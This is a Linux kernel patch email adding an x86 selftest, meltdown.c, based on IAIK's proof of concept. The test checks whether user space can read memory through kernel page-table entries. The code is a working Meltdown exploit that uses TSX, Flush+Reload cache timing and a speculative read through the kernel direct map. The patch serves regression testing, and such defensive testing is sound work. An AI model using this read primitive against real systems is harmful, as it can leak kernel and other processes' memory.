To capture potential programming errors like mistakenly setting the Global
bit on kernel page table entries, add a selftest for Meltdown. The selftest
is based on https://github.com/IAIK/meltdown.

What this test does is: first, place a predefined string at a random user
address; then, with pagemap, get the physical address of this string;
finally, try to fetch the data through the kernel's direct map address for
this physical address, to see if user space can read data through the
kernel's page table.

Per my tests, this test works well on CPUs that have TSX support. For this
reason, this selftest only runs on CPUs that support TSX.

This test requires knowledge of the direct map base. IAIK used the
following two methods to get the direct map base:
1) through a kernel module that shows phys_to_virt(0);
2) by exploiting the same HW vulnerability to guess the base.
Method 1 makes running this selftest complex, while method 2 is not
reliable and I do not want to use a possibly wrong value to run this test,
so the test reads the base from the kernel page table dump in debugfs
instead. Suggestions are welcome.

Tested on both x86_64 and i386_pae VMs on a host with an i7-7700K CPU; the
success rate is about 50% when the nopti kernel cmdline is used.

As for the legal stuff: add an Intel copyright notice because of a
significant contribution to this code. This also makes it clear who did
the relicensing from Zlib to GPLv2.

Also, just to be crystal clear, I have included my Signed-off-by on this
contribution because I certify that (from submitting-patches.rst):

  (b) The contribution is based upon previous work that, to the best of
      my knowledge, is covered under an appropriate open source license
      and I have the right under that license to submit that work with
      modifications, whether created in whole or in part by me, under
      the same open source license (unless I am permitted to submit
      under a different license), as indicated in the file; or

In this case, I have the right under the license to submit this work.
That license also permits me to relicense to GPLv2 and submit under the
new license.
I came to the conclusion that this work is OK to submit with all of the
steps I listed above (copyright notices, license terms and relicensing)
by strictly following all of the processes required by my employer. This
does not include a Signed-off-by from a corporate attorney. Instead, I
offer the next best thing: an ack from one of the maintainers of this
code, who can also attest that this has followed all of the proper
processes of our employer.

[dhansen: advice on changelog of the legal part]

Signed-off-by: Aaron Lu <aaron.lu@xxxxxxxxx>
Acked-by: Dave Hansen <dave.hansen@xxxxxxxxxxxxxxx> # Intel licensing process
---
v3: address legal related concerns raised by Greg KH by adding an Intel
copyright in the header and explaining in the changelog; no code change.

 tools/testing/selftests/x86/Makefile   |   2 +-
 tools/testing/selftests/x86/meltdown.c | 420 +++++++++++++++++++++++++
 2 files changed, 421 insertions(+), 1 deletion(-)
 create mode 100644 tools/testing/selftests/x86/meltdown.c

diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
index 0388c4d60af0..36f99c360a56 100644
--- a/tools/testing/selftests/x86/Makefile
+++ b/tools/testing/selftests/x86/Makefile
@@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie)
 TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \
 			check_initial_reg_state sigreturn iopl ioperm \
 			test_vsyscall mov_ss_trap \
-			syscall_arg_fault fsgsbase_restore sigaltstack
+			syscall_arg_fault fsgsbase_restore sigaltstack meltdown
 TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \
 			test_FCMOV test_FCOMI test_FISTTP \
 			vdso_restorer
diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c
new file mode 100644
index 000000000000..0ad4b65adcd0
--- /dev/null
+++ b/tools/testing/selftests/x86/meltdown.c
@@ -0,0 +1,420 @@
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * Copyright (c) 2022 Intel
+ *
+ * This selftest is based on code from https://github.com/IAIK/meltdown
+ * and can be used to check if user space can read data through kernel
+ * page table entries.
+ *
+ * Note for the i386 test: because the kernel prefers to use high memory
+ * for user programs, it is necessary to restrict the available memory to
+ * below the low memory size (around ~896MiB) so that the memory hosting
+ * "string" in main() is directly mapped.
+ *
+ * Note for both the x86_64 and i386 tests: the hardware race window
+ * cannot be exploited 100% of the time, so a single run of the test on a
+ * vulnerable system may not FAIL. My tests on an i7-7700K cpu have a
+ * success rate of about 50%.
+ *
+ * The original copyright and license information are shown below:
+ *
+ * Copyright (c) 2018 meltdown
+ *
+ * This software is provided 'as-is', without any express or implied
+ * warranty. In no event will the authors be held liable for any damages
+ * arising from the use of this software.
+ *
+ * Permission is granted to anyone to use this software for any purpose,
+ * including commercial applications, and to alter it and redistribute it
+ * freely, subject to the following restrictions:
+ *
+ * 1. The origin of this software must not be misrepresented; you must not
+ *    claim that you wrote the original software. If you use this software
+ *    in a product, an acknowledgment in the product documentation would be
+ *    appreciated but is not required.
+ *
+ * 2. Altered source versions must be plainly marked as such, and must not be
+ *    misrepresented as being the original software.
+ *
+ * 3. This notice may not be removed or altered from any source
+ *    distribution.
+ */
+
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <cpuid.h>
+#include <errno.h>
+#include <err.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+
+#define PAGE_SHIFT 12
+#define PAGE_SIZE 0x1000
+#define PUD_SHIFT 30
+#define PUD_SIZE (1UL << PUD_SHIFT)
+#define PUD_MASK (~(PUD_SIZE - 1))
+
+#define _XBEGIN_STARTED (~0u)
+
+/* configurables */
+#define NR_MEASUREMENTS 3
+#define NR_TRIES 10000
+
+size_t cache_miss_threshold;
+unsigned long directmap_base;
+
+static int get_directmap_base(void)
+{
+	char *buf;
+	FILE *fp;
+	size_t n = 0;
+	int ret;
+
+	fp = fopen("/sys/kernel/debug/page_tables/kernel", "r");
+	if (!fp)
+		return -1;
+
+	buf = NULL;
+	ret = -1;
+	while (getline(&buf, &n, fp) != -1) {
+		if (!strstr(buf, "Kernel Mapping"))
+			continue;
+
+		if (getline(&buf, &n, fp) != -1 &&
+		    sscanf(buf, "0x%lx", &directmap_base) == 1) {
+			printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK);
+			directmap_base &= PUD_MASK;
+			ret = 0;
+			break;
+		}
+	}
+
+	fclose(fp);
+	free(buf);
+	return ret;
+}
+
+/*
+ * Requires root due to pagemap.
+ */
+static int virt_to_phys(unsigned long virt, unsigned long *phys)
+{
+	unsigned long pfn;
+	uint64_t val;
+	int fd, ret;
+
+	fd = open("/proc/self/pagemap", O_RDONLY);
+	if (fd == -1) {
+		printf("[INFO]\tFailed to open pagemap\n");
+		return -1;
+	}
+
+	ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t));
+	if (ret == -1) {
+		printf("[INFO]\tFailed to read pagemap\n");
+		goto out;
+	}
+
+	if (!(val & (1ULL << 63))) {
+		printf("[INFO]\tPage not present according to pagemap\n");
+		ret = -1;
+		goto out;
+	}
+
+	pfn = val & ((1ULL << 55) - 1);
+	if (pfn == 0) {
+		printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n");
+		ret = -1;
+		goto out;
+	}
+
+	ret = 0;
+	*phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1));
+
+out:
+	close(fd);
+	return ret;
+}
+
+static uint64_t rdtsc(void)
+{
+	uint64_t a = 0, d = 0;
+
+	asm volatile("mfence");
+#ifdef __x86_64__
+	asm volatile("rdtsc" : "=a"(a), "=d"(d));
+#else
+	asm volatile("rdtsc" : "=A"(a));
+#endif
+	a = (d << 32) | a;
+	asm volatile("mfence");
+
+	return a;
+}
+
+#ifdef __x86_64__
+static void maccess(void *p)
+{
+	asm volatile("movq (%0), %%rax\n" : : "c"(p) : "rax");
+}
+
+static void flush(void *p)
+{
+	asm volatile("clflush 0(%0)\n" : : "c"(p) : "rax");
+}
+
+#define MELTDOWN \
+	asm volatile("1:\n" \
+		     "movzx (%%rcx), %%rax\n" \
+		     "shl $12, %%rax\n" \
+		     "jz 1b\n" \
+		     "movq (%%rbx,%%rax,1), %%rbx\n" \
+		     : \
+		     : "c"(virt), "b"(array) \
+		     : "rax");
+#else
+static void maccess(void *p)
+{
+	asm volatile("movl (%0), %%eax\n" : : "c"(p) : "eax");
+}
+
+static void flush(void *p)
+{
+	asm volatile("clflush 0(%0)\n" : : "c"(p) : "eax");
+}
+
+#define MELTDOWN \
+	asm volatile("1:\n" \
+		     "movzx (%%ecx), %%eax\n" \
+		     "shl $12, %%eax\n" \
+		     "jz 1b\n" \
+		     "mov (%%ebx,%%eax,1), %%ebx\n" \
+		     : \
+		     : "c"(virt), "b"(array) \
+		     : "eax");
+#endif
+
+static void detect_flush_reload_threshold(void)
+{
+	size_t reload_time = 0, flush_reload_time = 0, i, count = 1000000;
+	size_t dummy[16];
+	size_t *ptr = dummy + 8;
+	uint64_t start = 0, end = 0;
+
+	maccess(ptr);
+	for (i = 0; i < count; i++) {
+		start = rdtsc();
+		maccess(ptr);
+		end = rdtsc();
+		reload_time += (end - start);
+	}
+
+	for (i = 0; i < count; i++) {
+		start = rdtsc();
+		maccess(ptr);
+		end = rdtsc();
+		flush(ptr);
+		flush_reload_time += (end - start);
+	}
+
+	reload_time /= count;
+	flush_reload_time /= count;
+
+	printf("[INFO]\tFlush+Reload: %zd cycles, Reload only: %zd cycles\n",
+	       flush_reload_time, reload_time);
+	cache_miss_threshold = (flush_reload_time + reload_time * 2) / 3;
+	printf("[INFO]\tFlush+Reload threshold: %zd cycles\n", cache_miss_threshold);
+}
+
+static int flush_reload(void *ptr)
+{
+	uint64_t start, end;
+
+	start = rdtsc();
+	maccess(ptr);
+	end = rdtsc();
+
+	flush(ptr);
+
+	if (end - start < cache_miss_threshold)
+		return 1;
+
+	return 0;
+}
+
+static int check_tsx(void)
+{
+	if (__get_cpuid_max(0, NULL) >= 7) {
+		unsigned a, b, c, d;
+
+		__cpuid_count(7, 0, a, b, c, d);
+		return (b & (1 << 11)) ? 1 : 0;
+	} else
+		return 0;
+}
+
+/* Byte-encoded "xbegin 1f; 1:" so that assemblers without TSX support
+ * can still build this test. */
+static unsigned int xbegin(void)
+{
+	unsigned int status;
+
+	asm volatile(".byte 0xc7,0xf8,0x00,0x00,0x00,0x00" : "=a"(status) : "a"(-1UL) : "memory");
+
+	return status;
+}
+
+/* Byte-encoded "xend" */
+static void xend(void)
+{
+	asm volatile(".byte 0x0f; .byte 0x01; .byte 0xd5" ::: "memory");
+}
+
+static int __read_phys_memory_tsx(unsigned long phys, char *array)
+{
+	unsigned long virt;
+	int i, retries;
+
+	virt = phys + directmap_base;
+	for (retries = 0; retries < NR_TRIES; retries++) {
+		if (xbegin() == _XBEGIN_STARTED) {
+			MELTDOWN;
+			xend();
+		}
+
+		for (i = 1; i < 256; i++) {
+			if (flush_reload(array + i * PAGE_SIZE))
+				return i;
+		}
+	}
+
+	return 0;
+}
+
+/*
+ * Read physical memory by exploiting HW bugs.
+ * One byte a time.
+ */
+static int read_phys_memory(unsigned long phys, char *array)
+{
+	char res_stat[256];
+	int i, j, r, max_v, max_i;
+
+	memset(res_stat, 0, sizeof(res_stat));
+
+	for (i = 0; i < NR_MEASUREMENTS; i++) {
+		for (j = 0; j < 256; j++)
+			flush(array + j * PAGE_SIZE);
+
+		r = __read_phys_memory_tsx(phys, array);
+		if (r != 0)
+			res_stat[r]++;
+	}
+
+	max_i = 0;
+	max_v = 0;
+	for (i = 1; i < 256; i++) {
+		if (res_stat[i] > max_v) {
+			max_i = i;
+			max_v = res_stat[i];
+		}
+	}
+
+	if (max_v == 0)
+		return 0;
+
+	return max_i;
+}
+
+#ifdef __i386__
+/* The 32-bit version is only meant to run on a PAE kernel */
+static int arch_test_mismatch(void)
+{
+	struct utsname buf;
+
+	if (uname(&buf) == -1) {
+		printf("[SKIP]\tCan't decide architecture\n");
+		return 1;
+	}
+
+	if (!strncmp(buf.machine, "x86_64", 6)) {
+		printf("[SKIP]\tNo need to run the 32-bit test on a 64-bit host\n");
+		return 1;
+	}
+
+	return 0;
+}
+#else
+static int arch_test_mismatch(void)
+{
+	return 0;
+}
+#endif
+
+static int test_meltdown(void)
+{
+	char string[] = "test string";
+	char *array, *result;
+	unsigned long phys;
+	int i, len, ret;
+
+	if (arch_test_mismatch())
+		return 0;
+
+	if (get_directmap_base() == -1) {
+		printf("[SKIP]\tFailed to get directmap base. Make sure you are root and kernel has CONFIG_PTDUMP_DEBUGFS\n");
+		return 0;
+	}
+
+	detect_flush_reload_threshold();
+
+	if (!check_tsx()) {
+		printf("[SKIP]\tNo TSX support\n");
+		return 0;
+	}
+
+	if (virt_to_phys((unsigned long)string, &phys) == -1) {
+		printf("[FAIL]\tFailed to convert virtual address to physical address\n");
+		return -1;
+	}
+
+	len = strlen(string);
+	result = malloc(len + 1);
+	if (!result) {
+		printf("[FAIL]\tNot enough memory for malloc\n");
+		return -1;
+	}
+	memset(result, 0, len + 1);
+
+	array = mmap(NULL, 256 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+	if (array == MAP_FAILED) {
+		printf("[FAIL]\tNot enough memory for mmap\n");
+		free(result);
+		return -1;
+	}
+	memset(array, 0, 256 * PAGE_SIZE);
+
+	for (i = 0; i < len; i++, phys++) {
+		result[i] = read_phys_memory(phys, array);
+		if (result[i] == 0)
+			break;
+	}
+
+	ret = !strncmp(string, result, len);
+	if (ret)
+		printf("[FAIL]\tSystem is vulnerable to meltdown.\n");
+	else
+		printf("[OK]\tSystem might not be vulnerable to meltdown.\n");
+
+	munmap(array, 256 * PAGE_SIZE);
+	free(result);
+
+	return ret;
+}
+
+int main(void)
+{
+	printf("[RUN]\tTest if system is vulnerable to meltdown\n");
+
+	return test_meltdown();
+}
-- 
2.38.1